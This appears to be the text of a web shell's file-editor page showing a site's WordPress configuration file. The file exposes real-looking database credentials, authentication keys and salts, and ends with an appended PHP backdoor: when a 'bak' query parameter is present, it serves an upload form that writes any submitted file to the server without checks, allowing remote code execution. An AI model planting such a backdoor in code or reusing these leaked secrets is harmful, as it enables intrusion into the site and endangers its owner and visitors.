Edit file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_glm1a'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_cec7b'); /** Database password */ define('DB_PASSWORD', 'CO?98LMt$m84uvKT'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'b6_@J&+(_c3F9RCbLZ~pWhl;k7:4ZJBOr;a!9!&+wMA16)e/#/8fA%B(vz+fCQ/X'); define('SECURE_AUTH_KEY', '7:2hGHs7;vHS]-*~vF13/s5lx~tg8uB42l*j1h)373:*vWi;S/K_4Lxh/1*8ZQj/'); define('LOGGED_IN_KEY', ';8*0|QM7ZydVsX19&h3:6)~]_6nN234Xx53Y(5[8s(C|80+C[CEFj)0(&53f69WK'); define('NONCE_KEY', 'WF958FN5aze1Vwy0k%8IG2+9|SfF|de)848I3K5[v0)@1|~5Z-v-D4yFoe)u+r17'); define('AUTH_SALT', 'st+53isk*|!jgjCb1h#59[LTp08/jQ_q[]4TAHR~!JkN!of;Jr((fzx3qZ1R@iD:'); define('SECURE_AUTH_SALT', ')FzR]#vH0Px5_BV@-HJ*(2q*793CutvopY*T-Qvw9e:l##W[kd6WXlN_&H9+Y~!r'); define('LOGGED_IN_SALT', ')#tBq-74lw(D/2z0~_/Z2X]s/@vUP1M@s99&Mn_8/J0pUVc#+/DknyO*390p68wE'); define('NONCE_SALT', 't#7)tN/]8S];ty|X);))E6JMe!tHr02&R+4R3Ps4vqIX+[]6z~*%~bbx7x)825f%'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'xlcxeXWV_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'WP_CACHE_KEY_SALT', '49cccc0c790dcea385ee3f5a5c9460db' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?> Save